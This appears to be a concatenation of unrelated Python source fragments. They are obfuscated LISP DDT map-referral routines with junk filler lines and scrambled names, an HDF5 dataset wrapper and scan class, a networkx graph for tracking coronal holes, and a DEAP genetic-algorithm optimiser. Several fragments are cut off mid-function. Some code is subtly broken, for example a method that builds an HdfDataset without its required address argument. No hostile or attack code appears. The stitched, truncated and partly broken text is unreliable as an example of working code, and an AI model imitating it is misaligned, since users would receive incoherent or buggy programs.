if 26 - 26: Ii1I % O0 - i1IIi % iII111i * OoO0O00
def lisp_ddt_process_map_request ( lisp_sockets , map_request , ecm_source , port ) :
if 60 - 60: I1ii11iIi11i * iII111i / OoOoOO00 . o0oOOo0O0Ooo / iIii1I11I1II1
if 94 - 94: OoO0O00 . ooOoO0o
if 25 - 25: I1Ii111 % OOooOOo
if 82 - 82: Ii1I
i1OO0o = map_request . target_eid
Oo000o0o0 = map_request . target_group
oo0ooooO = lisp_print_eid_tuple ( i1OO0o , Oo000o0o0 )
iIiIi1i1Iiii = map_request . nonce
I11IiIi1I = LISP_DDT_ACTION_NULL
if 17 - 17: iII111i . i1IIi . i1IIi
if 76 - 76: OoooooooOO % IiII
if 81 - 81: iII111i . OOooOOo * i1IIi
if 14 - 14: oO0o
if 16 - 16: iII111i
I11 = None
if ( lisp_i_am_ms ) :
IIII = lisp_site_eid_lookup ( i1OO0o , Oo000o0o0 , False )
if ( IIII == None ) : return
if 65 - 65: i11iIiiIii
if ( IIII . registered ) :
I11IiIi1I = LISP_DDT_ACTION_MS_ACK
iiI = 1440
else :
i1OO0o , Oo000o0o0 , I11IiIi1I = lisp_ms_compute_neg_prefix ( i1OO0o , Oo000o0o0 )
I11IiIi1I = LISP_DDT_ACTION_MS_NOT_REG
iiI = 1
if 11 - 11: i1IIi - Oo0Ooo % O0 . II111iiii % oO0o
else :
I11 = lisp_ddt_cache_lookup ( i1OO0o , Oo000o0o0 , False )
if ( I11 == None ) :
I11IiIi1I = LISP_DDT_ACTION_NOT_AUTH
iiI = 0
lprint ( "DDT delegation entry not found for EID {}" . format ( green ( oo0ooooO , False ) ) )
if 43 - 43: I1Ii111 - Oo0Ooo % II111iiii / Ii1I . iII111i . iIii1I11I1II1
elif ( I11 . is_auth_prefix ( ) ) :
if 69 - 69: I11i - I11i / I11i + IiII - I1IiiI
if 21 - 21: I1IiiI * OoO0O00 * oO0o . o0oOOo0O0Ooo + II111iiii
if 62 - 62: ooOoO0o - OoooooooOO / I1ii11iIi11i / iII111i - o0oOOo0O0Ooo
if 70 - 70: oO0o % OoooooooOO * I1IiiI - OoOoOO00 * OoOoOO00 . OOooOOo
I11IiIi1I = LISP_DDT_ACTION_DELEGATION_HOLE
iiI = 15
I11I111Ii1II = I11 . print_eid_tuple ( )
lprint ( ( "DDT delegation entry not found but auth-prefix {} " + "found for EID {}" ) . format ( I11I111Ii1II ,
# I1ii11iIi11i * II111iiii
green ( oo0ooooO , False ) ) )
if 59 - 59: OoO0O00
if ( Oo000o0o0 . is_null ( ) ) :
i1OO0o = lisp_ddt_compute_neg_prefix ( i1OO0o , I11 ,
lisp_ddt_cache )
else :
Oo000o0o0 = lisp_ddt_compute_neg_prefix ( Oo000o0o0 , I11 ,
lisp_ddt_cache )
i1OO0o = lisp_ddt_compute_neg_prefix ( i1OO0o , I11 ,
I11 . source_cache )
if 81 - 81: i11iIiiIii
I11 = None
else :
I11I111Ii1II = I11 . print_eid_tuple ( )
lprint ( "DDT delegation entry {} found for EID {}" . format ( I11I111Ii1II , green ( oo0ooooO , False ) ) )
if 57 - 57: Oo0Ooo * iIii1I11I1II1 - OoOoOO00 % iII111i % I1ii11iIi11i + Ii1I
iiI = 1440
if 82 - 82: IiII * Oo0Ooo - iIii1I11I1II1 - i11iIiiIii
if 85 - 85: OoooooooOO
if 37 - 37: OoooooooOO + O0 + I1ii11iIi11i + IiII * iII111i
if 15 - 15: i11iIiiIii / Oo0Ooo - OOooOOo . IiII
if 11 - 11: OOooOOo / i1IIi % Oo0Ooo
if 65 - 65: OOooOOo % I1ii11iIi11i
iI1IIII1ii1 = lisp_build_map_referral ( i1OO0o , Oo000o0o0 , I11 , I11IiIi1I , iiI , iIiIi1i1Iiii )
iIiIi1i1Iiii = map_request . nonce >> 32
if ( map_request . nonce != 0 and iIiIi1i1Iiii != 0xdfdf0e1d ) : port = LISP_CTRL_PORT
lisp_send_map_referral ( lisp_sockets , iI1IIII1ii1 , ecm_source , port )
return
if 25 - 25: o0oOOo0O0Ooo - I1Ii111 * I1ii11iIi11i + OoooooooOO
if 93 - 93: OoOoOO00 % I1ii11iIi11i * I11i
if 34 - 34: I11i - oO0o + I11i * OoooooooOO * I11i
if 73 - 73: OOooOOo * iII111i * OoO0O00
if 11 - 11: I1Ii111 * II111iiii
if 3 - 3: Oo0Ooo * OOooOOo
if 13 - 13: I1Ii111 + i11iIiiIii / OOooOOo
if 98 - 98: I1IiiI * Oo0Ooo
if 9 - 9: O0 / i11iIiiIii . iIii1I11I1II1 . IiII
if 14 - 14: OoOoOO00 . OOooOOo - Oo0Ooo + I1Ii111 % ooOoO0o
if 95 - 95: OoO0O00 * II111iiii + i1IIi
if 22 - 22: Ii1I / ooOoO0o % I11i + OoO0O00 . ooOoO0o
if 61 - 61: O0 - iIii1I11I1II1 * Oo0Ooo . Ii1I + O0
def lisp_find_negative_mask_len ( eid , entry_prefix , neg_prefix ) :
I1I1I = eid . hash_address ( entry_prefix )
OO0o0OoooOOoO = eid . addr_length ( ) * 8
ooooOo00OO0o = 0
if 4 - 4: O0 * iII111i - iII111i + iIii1I11I1II1 * iIii1I11I1II1
if 48 - 48: I1Ii111 * I11i
if 52 - 52: ooOoO0o
if 16 - 16: ooOoO0o % iII111i - o0oOOo0O0Ooo % I11i + i11iIiiIii
for ooooOo00OO0o in range ( OO0o0OoooOOoO ) :
iIIiI1iiIIiIiii = 1 << ( OO0o0OoooOOoO - ooooOo00OO0o - 1 )
if ( I1I1I & iIIiI1iiIIiIiii ) : break
if 33 - 33: oO0o % I1Ii111 % Oo0Ooo . Ii1I
if 3 - 3: I1Ii111 . o0oOOo0O0Ooo
if ( ooooOo00OO0o > neg_prefix . mask_len ) : neg_prefix . mask_len = ooooOo00OO0o
return
if 6 - 6: oO0o . OoOoOO00 * i11iIiiIii
if 96 - 96: i1IIi . OoO0O00 . OoO0O00 - o0oOOo0O0Ooo - Ii1I
if 33 - 33: ooOoO0o + I1ii11iIi11i - I1IiiI . iII111i / OoO0O00
if 91 - 91: OOooOOo - OoooooooOO . OoO0O00
if 34 - 34: Ii1I . I1IiiI . i1IIi * I1ii11iIi11i
if 77 - 77: ooOoO0o . II111iiii
if 41 - 41: IiII
if 27 - 27: IiII / IiII
if 91 - 91: Ii1I
if 93 - 93: OoO0O00 * OoO0O00 * I1ii11iIi11i * OoO0O00 * o0oOOo0O0Ooo
def lisp_neg_prefix_walk ( entry , parms ) :
i1OO0o , O0OOO0oO0OO0 , iiII1iI = parms
if 8 - 8: I1ii11iIi11i
if ( O0OOO0oO0OO0 == None ) :
if ( entry . eid . instance_id != i1OO0o . instance_id ) :
return ( [ True , parms ] )
if 88 - 88: I11i
if ( entry . eid . afi != i1OO0o . afi ) : return ( [ True , parms ] )
else :
if ( entry . eid . is_more_specific ( O0OOO0oO0OO0 ) == False ) :
return ( [ True , parms ] )
if 36 - 36: iIii1I11I1II1 - ooOoO0o * OoO0O00 * OoO0O00 . II111iiii
if 49 - 49: O0 + OoO0O00 - I1ii11iIi11i + ooOoO0o
if 90 - 90: O0 . Ii1I * OOooOOo * OoooooooOO * ooOoO0o * Ii1I
if 12 - 12: ooOoO0o * OoooooooOO * i1IIi
if 3 - 3: o0oOOo0O0Ooo + Ii1I - i1IIi . OoooooooOO % Ii1I
if 39 - 39: o0oOOo0O0Ooo
lisp_find_negative_mask_len ( i1OO0o , entry . eid , iiII1iI )
return ( [ True , parms ] )
if 73 - 73: IiII
if 92 - 92: OOooOOo / ooOoO0o . I1Ii111 . iII111i / ooOoO0o
if 83 - 83: iIii1I11I1II1 - OoO0O00 - I1Ii111
if 27 - 27: IiII - iII111i * i11iIiiIii % i11iIiiIii + OoOoOO00 . I1Ii111
if 10 - 10: IiII / i11iIiiIii
if 6 - 6: I11i - OOooOOo
if 100 - 100: Oo0Ooo / OOooOOo + iII111i - o0oOOo0O0Ooo + OoO0O00 % IiII
if 91 - 91: Ii1I % I11i % Oo0Ooo / OoO0O00 - II111iiii - o0oOOo0O0Ooo
def lisp_ddt_compute_neg_prefix ( eid , ddt_entry , cache ) :
if 50 - | |
Images can be stored as list of file directories when using tif file,
or as a dynamic hdf link to a hdf file.
:param hdf_group: hdf5 File or Group object
:param address_list: list of str: list of str to search in
:param multiple: if True, return list of all addresses matching criteria
:return: str or list of str
"""
if address_list is None:
address_list = dataset_addresses(hdf_group)
all_addresses = []
# First look for 2D image data
for address in address_list:
data = hdf_group.get(address)
if not data or data.size == 1: continue
if len(data.shape) > 1 and 'signal' in data.attrs:
if multiple:
all_addresses += [address]
else:
return address
# Second look for image files
for address in address_list:
data = hdf_group.get(address)
if 'signal' in data.attrs: # not sure if this generally true, but seems to work for pilatus and bpm images
if multiple:
all_addresses += [address]
else:
return address
"""
file = str(data[0])
file = os.path.join(filepath, file)
if os.path.isfile(file):
if multiple:
all_addresses += [address]
else:
return address
"""
if multiple:
return all_addresses
else:
return None
"----------------------------------------------------------------------------------------------------------------------"
"-------------------------------------------- DatasetWrapper ----------------------------------------------------------"
"----------------------------------------------------------------------------------------------------------------------"
class HdfDataset:
"""
HDF Dataset reloader
Self contained holder for a HDF5 dataset, will load the data when called
dataset = HdfAddress('hdf/file/path.hdf', '/dataset/address')
data = dataset()
HdfDataset has attributes:
dataset.filename
dataset.address
dataset.name
dataset.group
dataset.size
dataset.shape
dataset.ndim
dataset.len
If the hdf address doesn't associate with a dataset in the hdf file, a KeyError is raised
"""
size = 0
shape = 0
ndim = 0
len = 0
def __init__(self, filename, address):
self.filename = filename
self.address = address
self.name = address_name(address)
self.group = address_group(address)
# Check address
with load(self.filename) as hdf:
dataset = hdf.get(self.address)
if dataset is None:
raise KeyError('"%s" is not availble in %s' % (self.address, self.filename))
self._update(dataset)
def __repr__(self):
return "HdfDataset(\"%s\", \"%s\", shape: %s)" % (self.filename, self.address, self.shape)
def __len__(self):
return self.len
def __call__(self):
return self._load_data()
def _update(self, dataset):
self.size = dataset.size
self.shape = dataset.shape
self.ndim = dataset.ndim
self.len = dataset.len()
def _load_data(self):
with load(self.filename) as hdf:
dataset = hdf.get(self.address)
self._update(dataset)
data = dataset_data(dataset)
return data
def files(self, filenames, default=None):
"""Generate another address object pointing at a different file"""
filenames = fn.liststr(filenames)
if len(filenames) == 1:
try:
return HdfDataset(filenames[0])
except KeyError:
return default
out = []
for filename in filenames:
out += [self.files(filename, default)]
return out
def data(self):
"""Return data directly from dataset"""
with load(self.filename) as hdf:
dataset = hdf.get(self.address)
self._update(dataset)
data = dataset_data(dataset)
return data
def string(self):
"""Return string from dataset"""
with load(self.filename) as hdf:
dataset = hdf.get(self.address)
self._update(dataset)
data = dataset_string(dataset)
return data
def value(self):
"""Return float value or mean of array"""
with load(self.filename) as hdf:
dataset = hdf.get(self.address)
self._update(dataset)
data = np.mean(dataset)
return data
def array(self, array_len=1):
"""Return array, single values are copied"""
data = self.data()
if self.ndim == 1:
return data
if self.ndim == 0:
return np.repeat(data, array_len)
return np.reshape(data, -1)
"----------------------------------------------------------------------------------------------------------------------"
"---------------------------------------------- HdfWrapper ------------------------------------------------------------"
"----------------------------------------------------------------------------------------------------------------------"
class HdfWrapper(h5py.File):
"""
Implementation of h5py.File, with additional functions
nx = Hdf5Nexus('/data/12345.nxs')
Additional functions:
nx.nx_dataset_addresses() - list of all hdf addresses for datasets
nx.nx_tree_str() - string of internal data structure
nx.nx_find_name('eta') - returns hdf address
nx.nx_find_addresses( addresses=['/']) - returns list of addresses
nx.nx_find_attr(attr='signal') - returns address with attribute
nx.nx_find_image() - returns address of image data
nx.nx_getdata(address) - returns numpy array of data at address
nx.nx_array_data(n_points, addresses) - returns dict of n length arrays and dict of addresses
nx.nx_value_data(addresses) - returns dict of values and dict of addresses
nx.nx_str_data(addresses, format) - returns dict of string output and dict of addresses
nx.nx_image_data(index, all) - returns 2/3D array of image data
"""
def __init__(self, filename, mode='r', *args, **kwargs):
super(HdfWrapper, self).__init__(filename, mode, *args, **kwargs)
def nx_reload(self):
"""Closes the hdf file and re-opens"""
filename = self.filename
self.close()
self.__init__(filename)
def tree(self, address='/', detail=False):
return tree(self.get(address), detail=detail)
def dataset_addresses(self, addresses='/', recursion_limit=100, get_size=None, get_ndim=None):
"""
Return list of addresses of datasets, starting at each address
:param hdf_group: hdf5 File or Group object
:param addresses: list of str or str : time_start in this / these addresses
:param recursion_limit: Limit on recursivley checking lower groups
:param get_size: None or int, if int, return only datasets with matching size
:param get_ndim: None or int, if int, return only datasets with matching ndim
:return: list of str
"""
return dataset_addresses(self.get('/'), addresses, recursion_limit, get_size, get_ndim)
def find(self, name, match_case=True, whole_word=True):
address_list = self.dataset_addresses()
return find_name(name, address_list, match_case, whole_word)
def find_image(self):
return find_image(self.get('/'), multiple=True)
def find_attr(self, attr):
return find_attr(self.get('/'), attr)
def find_nxclass(self, nx_class):
return find_nxclass(self.get('/'), nx_class)
"----------------------------------------------------------------------------------------------------------------------"
"---------------------------------------------- HdfScan -------------------------------------------------------------"
"----------------------------------------------------------------------------------------------------------------------"
class HdfScan(Scan):
"""
Scan for HDF files
Only reads data when requested, and stores data in the internal namespace
Data can be requested using the hdf address or the name of the dataset (e.g. /entry1/data/name)
Usage:
d = HdfScan('hdf_file.nxs')
d('entry1/data/sum') >> finds dataset at this location, returns the array
d('eta') >> finds dataset called 'eta' in hdf file, returns the array
d.tree() >> returns str of hdf structure
d.address('name') >> returns hdf address of 'name'
d.find_name('name') >> returns list of hdf addresses matching 'name'
d.find_image() >> returns location of image data, either tiff link or 3d volume
d.axes() >> automatically finds the default xaxis, returns the array
d.signal() >> automatically finds the default yaxis, returns the array
d.image(idx) >> finds the image location if available and returns a detector image
"""
def __init__(self, filename, **kwargs):
self.filename = filename
self.file = fn.file2name(filename)
self.scan_number = fn.scanfile2number(filename)
namespace = {
'filename': filename,
'filetitle': self.file,
'scan_number': self.scan_number
}
alt_names = {
# shortcut: name in namespace
'scanno': ['scan_number'],
'cmd': ['scan_command'],
'energy': ['en'],
}
super(HdfScan, self).__init__(namespace, alt_names, **kwargs)
#self._label_str.extend(['scan_number', 'filetitle'])
self._hdf_address_list = []
self._hdf_name2address = {}
def reset(self):
"""Reset the namespace"""
self._namespace = {
'filename': self.filename,
'filetitle': self.file,
'scanno': self.scan_number
}
def __repr__(self):
out = 'HdfScan(filename: %s, namespace: %d, associations: %d)'
return out % (self.filename, len(self._namespace), len(self._alt_names))
def load(self):
"""Open and return hdf.File object"""
return HdfWrapper(self.filename)
def dataset(self, name):
"""Return dataset object"""
address = self.address(name)
return HdfDataset(self.filename, address)
def tree(self, group_address='/', detail=False, groups=False, recursion_limit=100):
"""
Return str of the full tree of data in a hdf object
:param group_address: str address of hdf group to time_start in
:param detail: False/ True - provide further information about each group and dataset, including attributes
:param groups: False/ True - only provide group level information
:param recursion_limit: int max number of levels
:return: str
"""
with load(self.filename) as hdf:
out = tree(hdf[group_address], detail, groups, recursion_limit)
return out
info = tree
def add2namespace(self, name, data=None, other_names=None, default_value=None, hdf_address=None):
"""
set data in namespace
:param name: str name
:param data: any or None, data to store in namespace (nothing stored if None)
:param other_names: str, list of str or None - strings to associate with name, giving the same result
:param default_value: any or None, data to store in default_value namespace (nothing stored if None)
:param hdf_address: str address in hdf file
:return: None
"""
super(HdfScan, self).add2namespace(name, data, other_names, default_value)
if hdf_address:
self._hdf_name2address[name] = hdf_address
self._debug('namespace', 'Add hdf address: %s: %s' % (name, hdf_address))
def _dataset_addresses(self):
"""
Return list of hdf addresses in hdf file
:return: list of str
"""
if self._hdf_address_list:
return self._hdf_address_list
self._debug('hdf', 'Loading address list from %s' % self.file)
with load(self.filename) as hdf_group:
out = dataset_addresses(hdf_group)
self._hdf_address_list = out
return out
def _load_data(self, name):
"""
Load data from hdf file
Overloads Scan._load_data to read hdf file
if 'name' not available, raises KeyError
:param name: str name or address of data
"""
address_list = self._dataset_addresses()
# find data address
with load(self.filename) as hdf:
address = get_address(hdf, name, address_list)
self._debug('hdf', 'Search hdf for %s, find: %s' % (name, address))
if not address and name in self._alt_names:
for alt_name in self._alt_names[name]:
# alt_names must find an exact match
address = get_address(hdf, alt_name, address_list, exact_only=True)
self._debug('hdf', 'Alt. Search hdf for %s, find: %s' % (alt_name, address))
if address is not None: break
if not address:
raise KeyError('\'%s\' not available in hdf file' % name)
dataset = hdf.get(address)
data = dataset_data(dataset)
# Store for later use
| |
<gh_stars>1-10
"""A data structure containing a Graph of coronal holes (or a set of connected sub-graphs).
Here, we analyze coronal hole connectivity- when do coronal holes merge? split? etc..
Note: this module imports networkx library.
Last Modified: May 17th, 2021 (Opal)
# todo: plot only on one axes???
"""
import networkx as nx
import matplotlib.pyplot as plt
import matplotlib.colors as c
import numpy as np
import json
class CoronalHoleGraph:
""" Coronal Hole SubGraph """
def __init__(self):
# Graph object.
self.G = nx.Graph()
# current frame number.
self.max_frame_num = 1
# y interval to plot at a time
self.y_window = 10
# number of connected sub-graphs to plot
self.plot_num_subgraphs = 5
# color dict.
self.color_dict = dict()
# total number of coronal holes.
self.total_num_of_coronal_holes = 0
# current frame number.
self.frame_num = 1
def __str__(self):
return json.dumps(
self.json_dict(), indent=4, default=lambda o: o.json_dict())
def json_dict(self):
return {
'num_of_nodes': self.G.number_of_nodes(),
'num_of_edges': self.G.number_of_edges(),
'num_of_connected_sub_graphs': len(nx.connected_components(self.G))
}
def insert_node(self, node):
"""Insert the coronal hole (node) to graph.
Parameters
----------
node: Contour() object
Returns
-------
"""
# add node to the connectivity graph.
name = self.get_unique_id(node)
if not self.G.has_node(name):
self.G.add_node(name,
area=node.area,
id=node.id,
frame_num=node.frame_num,
frame_timestamp=node.frame_timestamp,
count=node.count,
color=node.color,
net_flux=node.net_flux,
abs_flux=node.abs_flux)
def insert_edge(self, node_1, node_2, weight=0):
"""Insert an edge between two nodes (coronal hole objects)
Parameters
----------
weight: edge weight based on area overlap ratio.
node_1: : Contour() object
node_2: : Contour() object
Returns
-------
"""
# get contour's unique ID.
n1 = self.get_unique_id(node_1)
n2 = self.get_unique_id(node_2)
# if the edge does not exist then we create it.
if not self.G.has_edge(n1, n2):
# check if the two nodes are in the graph.
if not self.G.has_node(n1):
self.insert_node(node_1)
if not self.G.has_node(n2):
self.insert_node(node_2)
# add edge between two node in Graph, with an edge weight between 0 and 1.
self.G.add_edge(u_of_edge=n1, v_of_edge=n2, weight=weight)
@staticmethod
def get_unique_id(contour):
"""Get a unique ID for a given contour.
Parameters
----------
contour: Contour() object.
Returns
-------
float
"""
return str(contour.frame_num) + "_" + str(contour.id) + "_" + str(contour.count)
@staticmethod
def get_sub_graph_pos(sub_graph):
"""Return a dictionary with sub-graph node position used for matplotlib plot (see create_plots())
Parameters
----------
sub_graph: nx.subgraph()
connected sub-graph of self.G.
Returns
-------
dict() with nodes x-y coordinates for plotting purposes.
"""
# initialize position and label dictionaries.
pos = dict()
label = dict()
# iterate over all subgraph nodes.
for node in sub_graph:
# (x location, y location)- tuple
pos[node] = (sub_graph.nodes[node]["x-pos"], sub_graph.nodes[node]["frame_num"])
# class id number
label[node] = sub_graph.nodes[node]["id"]
return pos, label
@staticmethod
def assign_x_pos_for_each_node_in_subgraph(sub_graph):
"""Assign an x axis location attribute to each node
based on the number of nodes assigned in the same frame_num, for
plotting purposes (x-axis)
Returns
-------
subgraph
"""
# list of all frame numbers in input sub-graph
frame_list = [sub_graph.nodes[node]["frame_num"] for node in sub_graph]
# list of all IDs in the sub-graph.
id_list = [sub_graph.nodes[node]["id"] for node in sub_graph]
# each ID gets a count based on area.
count_list = list(set(id_list))
# check if there are multiple nodes of the same id in the same list.
tuple_list = list(zip(frame_list, id_list))
dup_max = dict()
for frame, id in set(tuple_list):
appearances = tuple_list.count((frame, id))
if appearances > 1:
if id in dup_max.keys():
if dup_max[id] < appearances:
dup_max[id] = appearances
else:
dup_max[id] = appearances
pp = 0 # x-pos starter for this id number.
for id in dup_max.keys():
holder = dup_max[id]
# update x-pos starter.
dup_max[id] = pp
# update x-pos starter for the next duplicated id.
pp += holder
# remove this id from the list of counts.
count_list.remove(id)
# assign (x-axis position) to each node
count_len = len(count_list)
for node in sub_graph:
if sub_graph.nodes[node]["id"] in count_list:
sub_graph.nodes[node]["x-pos"] = count_list.index(sub_graph.nodes[node]["id"])
else:
# it has multiple nodes with the same id in the same frame instance.
sub_graph.nodes[node]["x-pos"] = sub_graph.nodes[node]["count"] + count_len + \
dup_max[sub_graph.nodes[node]["id"]]
return sub_graph
def get_plot_features(self, sub_graph):
"""Return sub-graph node x-y location and label.
Parameters
----------
sub_graph: nx.subgraph()
connected sub-graph of self.G.
Returns
-------
pos, labels (dict, dict)
"""
self.assign_x_pos_for_each_node_in_subgraph(sub_graph=sub_graph)
pos, label = self.get_sub_graph_pos(sub_graph=sub_graph)
return pos, label
def get_edge_weight_lim(self):
"""Find the maximum edge weight in the graph.
Returns
-------
(float)
"""
if len(self.G.edges) == 0:
return 0, 0
else:
edge_weights = nx.get_edge_attributes(G=self.G, name='weight')
edges, weights = zip(*edge_weights.items())
return min(weights), max(weights)
@staticmethod
def average_area_of_subgraph(sub_graph):
"""Compute the average area of the nodes in subgraph. 1/frame_appearance *sum(node_area)
Returns
-------
(float)
"""
# list of node area.
area_list = [sub_graph.nodes[node]["area"] for node in sub_graph.nodes]
frame_appearance = [sub_graph.nodes[node]["frame_num"] for node in sub_graph.nodes]
return sum(area_list) / len(set(frame_appearance))
def order_subgraphs_based_on_area(self):
""" order the connected subgraphs in self.G based on area.
Returns
-------
(list) ordered subgraphs based on area.
"""
# list of all connected subgraphs in G
subgraph_list = list(nx.connected_components(self.G))
# compute the corresponding average area
corresponding_area = np.array([self.average_area_of_subgraph(sub_graph=self.G.subgraph(sub_graph))
for sub_graph in subgraph_list])
# sort the list above and save the corresponding index position of the sorted list.
sorted_index = np.argsort(-corresponding_area)
# return sorted subgraph list based on area. The subgraph with the largest area will show up first.
# (descending order)
return [subgraph_list[i] for i in sorted_index]
def return_list_of_nodes_in_frame_window(self, subgraph):
"""return a list of nodes in the frame window.
Parameters
----------
subgraph: a connected subgraph in G.
Returns
-------
(list) of contour nodes that are in the frame.
"""
node_list = []
for node in subgraph.nodes:
if self.max_frame_num < self.y_window:
node_list.append(node)
elif (self.max_frame_num - self.y_window) <= subgraph.nodes[node]["frame_num"] <= self.max_frame_num:
node_list.append(node)
return node_list
def create_plots(self, save_dir=False, subplots=True, timestamps=False, dpi=200):
"""Plot the resulting isolated connected sub - graphs in separate figures.
Parameters
----------
timestamps: (bool or list)
If set to False, y axis labels are the frame number. Otherwise y axis labels will be the timestamps.
subplots: (bool)
If subplot is True, then sub- graphs are plotted on the same figure in subplots. -
This is noy recommended when there are a large number of nodes in each subplot.
save_dir: (bool or str)
If not False, will save figures in save_dir directory.
Returns
-------
N/A
"""
num_of_subplots = len(list(nx.connected_components(self.G)))
if subplots:
num_columns = min(self.plot_num_subgraphs, num_of_subplots)
fig, axes = plt.subplots(nrows=1, ncols=num_columns, sharey=True)
axes = axes.flatten()
ii = 0
edge_color_bar = None
# number of deleted axes
del_axes = []
# sort the subgraphs based on area. The first subgraphs are long lived-large coronal holes.
sub_graph_list = self.order_subgraphs_based_on_area()[:min(self.plot_num_subgraphs, num_of_subplots)]
# loop over each subgraph and plot
for connectedG in sub_graph_list:
# connect sub graph.
sub_graph = self.G.subgraph(connectedG)
# prune the list of nodes for each plot based on their frame number.
list_of_nodes_in_range = self.return_list_of_nodes_in_frame_window(subgraph=sub_graph)
if len(list_of_nodes_in_range) == 0:
if subplots:
ii += -1
del_axes.append(ii)
elif len(list_of_nodes_in_range) > 0:
sub_graph = self.G.subgraph(nodes=list_of_nodes_in_range)
# plot a hierarchical graph.
if subplots:
ax = axes[ii]
else:
fig, ax = plt.subplots()
# draw graph, nodes positions are based on their count and frame_num.
# labels are the coronal hole id number.
pos, labels = self.get_plot_features(sub_graph=sub_graph)
if sub_graph.number_of_nodes() == 1:
# plot nodes and labels.
nx.draw(sub_graph, pos=pos, font_weight='bold', ax=ax, node_size=80,
node_color=[c.to_rgba(np.array(sub_graph.nodes[ch]["color"]) / 255)
for ch in sub_graph.nodes])
nx.draw_networkx_labels(G=sub_graph, pos=pos, labels=labels, ax=ax, font_size=8)
elif sub_graph.number_of_nodes() > 1:
edge_weights = nx.get_edge_attributes(G=sub_graph, name='weight')
if len(edge_weights) > 0:
edges, weights = zip(*edge_weights.items())
# plot nodes and labels.
nx.draw(sub_graph, pos=pos, font_weight='bold', ax=ax, node_size=80,
node_color=[c.to_rgba(np.array(sub_graph.nodes[ch]["color"]) / 255)
for ch in sub_graph.nodes], edgelist=[])
nx.draw_networkx_labels(G=sub_graph, pos=pos, labels=labels, ax=ax, font_size=8)
edge_color_bar = nx.draw_networkx_edges(sub_graph, pos=pos, edge_color=weights, edgelist=edges,
edge_cmap=plt.cm.get_cmap('Greys'), edge_vmin=0,
edge_vmax=1, width=3, ax=ax)
# nx.draw_networkx_edge_labels(G=sub_graph, pos=pos,
# edge_labels=edge_weights, ax=ax,
# alpha=1, font_size=5)
if subplots:
# Hide the right and top spines
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
# restrict y limits so the graph plot is readable.
if self.max_frame_num < self.y_window:
ax.set_ylim(0, self.max_frame_num + 0.5)
else:
ax.set_ylim((self.max_frame_num - self.y_window) - 0.5, self.max_frame_num + 0.5)
if ii == 0:
# Only show ticks on the left and bottom spines
ax.yaxis.set_ticks_position('left')
ax.set_xlim(tuple(sum(i) for i in zip(ax.get_xlim(), (-0.5, 0.5))))
# ax.xaxis.set_ticks_position('bottom')
# set x and y axis ticks to be integers
ax.yaxis.get_major_locator().set_params(integer=True)
ax.xaxis.get_major_locator().set_params(integer=True)
# timestamp as y axis.
if timestamps:
ax.set_yticklabels(timestamps)
ax.axis('on')
ax.set_ylabel("frame number")
else:
ax.set_xlim(tuple(sum(i) for i in zip(ax.get_xlim(), (-0.5, 0.5))))
ax.spines['left'].set_visible(False)
# ax.xaxis.set_ticks_position('bottom')
ax.xaxis.get_major_locator().set_params(integer=True)
ax.axis('on')
# label axes and title.
if not subplots:
ax.axis('on')
ax.set_xlabel("count")
| |
"""The main Optimiser class."""
import biopharma as bp
from biopharma.server.tasks import SoftTimeLimitExceeded
from biopharma.specs import Value, Table, in_units
from .individual import Individual, Variable
from .util import get_item, with_units
import numbers
import random
from enum import Enum
import deap.base
import deap.creator
import deap.tools
import numpy as np
__all__ = ['Optimiser', 'Tracking']
class Optimiser(bp.AnalysisComponent):
"""Genetic algorithm-based optimisation for PyBioPharma models.
TODO: Some documentation on how to do optimisation.
"""
PARAMETERS = {
'populationSize': Value(
int, 'How many individual facilities to evaluate in each population'),
'maxGenerations': Value(
int, 'How many generations of the genetic algorithm to run'),
'crossoverProbability': Value(
float, 'Probability that genetic crossover occurs between 2 individuals'),
'geneCrossoverProbability': Value(
float, 'If crossover occurs, probability that any single gene will be swapped'),
'mutationRate': Value(
float, 'Average number of genes in an individual that will mutate each generation'),
}
OUTPUTS = {
'finalPopulation': Value(list, 'The final population from the genetic algorithm'),
'bestIndividuals': Value(list, 'All non-dominated individuals'),
'bestObjectiveValues': Value(list, 'The fitness(es) recorded for the best individual(s)'),
'seed': Value(tuple, 'The initial state of the random number generator for this run')
}
def __init__(self, base_component, **kwargs):
"""Create a new optimiser.
:param base_component: the base component on which to run the optimiser
(typically, the Facility to optimise).
:param kwargs: further keyword arguments are passed to ModelComponent.__init__, notably
name and param_filename.
"""
super(Optimiser, self).__init__(**kwargs)
self.base = base_component
self.facility = self.base.facility
self.variable_specs = []
self.all_stats = {}
self.objectives = []
self.debug = False
self.load_parameters()
def add_variable(self, klass=Variable, *args, **kwargs):
"""Add a 'gene' specification that can vary across individuals.
:param klass: the class of Variable to use, in case a subclass is desired.
:param args: positional arguments to use when constructing instances of the class.
:param kwargs: keyword arguments to use when constructing instances of the class.
"""
assert issubclass(klass, Variable)
self.variable_specs.append((klass, args, kwargs))
def add_objective(self, component, item, collection='outputs',
minimise=False, maximise=False, weight=1.0):
"""Add a new objective to optimise for.
:param component: a function that takes a Facility instance as argument and returns the
component in which to look for the value of this objective for that Facility.
:param item: the name of the item (typically an output) within the component to use as
the objective value.
:param collection: which collection (i.e. inputs, parameters, or outputs) to look for
item in.
:param minimise: set to True if this objective should be minimised.
:param maximise: set to True if this objective should be maximised.
:param weight: can be used in multi-objective optimisation to make some objectives more
important than others. Should be a positive real number.
Exactly one of minimise or maximise must be set to True.
"""
assert minimise or maximise
assert not (minimise and maximise)
if minimise:
weight = -weight
self.objectives.append({
'component': component, 'item': item, 'collection': collection, 'weight': weight})
def run(self):
"""Run an optimisation.
Uses elitist single-objective or multi-objective GA at present.
"""
print('Running optimiser for {} generations with {} individuals'.format(
self.parameters['maxGenerations'], self.parameters['populationSize']))
# Reset the facility
self.facility.load_parameters()
# Record the current state of the random number generator
initial_seed = self.get_seed()
self.outputs['seed'] = initial_seed
if self.debug:
print("RNG state:", initial_seed)
# Initialise the GA tools
self._initialise()
toolbox = self.toolbox
params = self.parameters
stats = self.stats
logbook = self.logbook
# Create and evaluate initial population
pop = toolbox.population(n=params['populationSize'])
fitnesses = toolbox.map(toolbox.evaluate, pop)
for ind, fitness in zip(pop, fitnesses):
ind.fitness.values = fitness
print()
# Run generations
for gen in range(params['maxGenerations']):
# Record statistics for this generation
logbook.record(gen=gen, **stats.compile(pop))
print('Evolving generation', gen)
if self.debug:
print(pop)
# Select offspring for the next generation, and clone them
offspring = toolbox.select(pop, len(pop))
offspring = list(map(toolbox.clone, offspring))
# Apply crossover and mutation on the offspring
for child1, child2 in zip(offspring[::2], offspring[1::2]):
if random.random() < params['crossoverProbability']:
toolbox.mate(child1, child2)
